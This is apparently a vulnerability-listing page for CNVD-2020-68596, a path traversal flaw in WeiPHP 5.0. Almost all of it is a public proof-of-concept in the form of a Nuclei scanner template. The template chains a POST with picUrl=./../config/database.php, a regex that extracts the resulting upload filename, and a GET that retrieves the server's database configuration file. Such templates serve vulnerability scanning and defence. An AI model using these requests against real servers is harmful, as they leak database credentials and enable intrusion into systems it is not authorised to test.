CNVD-2020-68596: WeiPHP 5.0 - Path Traversal

日期: 2025-08-01 | 影响软件: WeiPHP 5.0 | POC: 已公开

漏洞描述

WeiPHP 5.0 is susceptible to directory traversal attacks.

PoC代码[已公开]

id: CNVD-2020-68596

info:
  name: WeiPHP 5.0 - Path Traversal
  author: pikpikcu
  severity: high
  description: WeiPHP 5.0 is susceptible to directory traversal attacks.
  reference:
    - http://wiki.peiqi.tech/PeiQi_Wiki/CMS%E6%BC%8F%E6%B4%9E/Weiphp/Weiphp5.0%20%E5%89%8D%E5%8F%B0%E6%96%87%E4%BB%B6%E4%BB%BB%E6%84%8F%E8%AF%BB%E5%8F%96%20CNVD-2020-68596.html
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 8.6
    cwe-id: CWE-22
  metadata:
    max-request: 3
  tags: cnvd,cnvd2020,weiphp,lfi

http:
  - raw:
      - |
        POST /public/index.php/material/Material/_download_imgage?media_id=1&picUrl=./../config/database.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        "1":1
      - |
        GET /public/index.php/home/file/user_pics HTTP/1.1
        Host: {{Hostname}}
      - |
        GET {{endpoint}} HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        name: endpoint
        part: body
        internal: true
        regex:
          - '/public/uploads/picture/(.*.jpg)'
    matchers:
      - type: word
        part: body
        words:
          - https://weiphp.cn
          - WeiPHP
          - DB_PREFIX
        condition: and
# digest: 4a0a0047304502207d6e0c3b25cabc5c2d06d9aec889e59aec8c9f3299681c4aa5dc41c9bb30a1b00221008e2878138ead1435ca95cc923cabb62bf2887398b0eed0a4968850ab6c2d35bf:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/./http/cnvd/2020/CNVD-2020-68596.yaml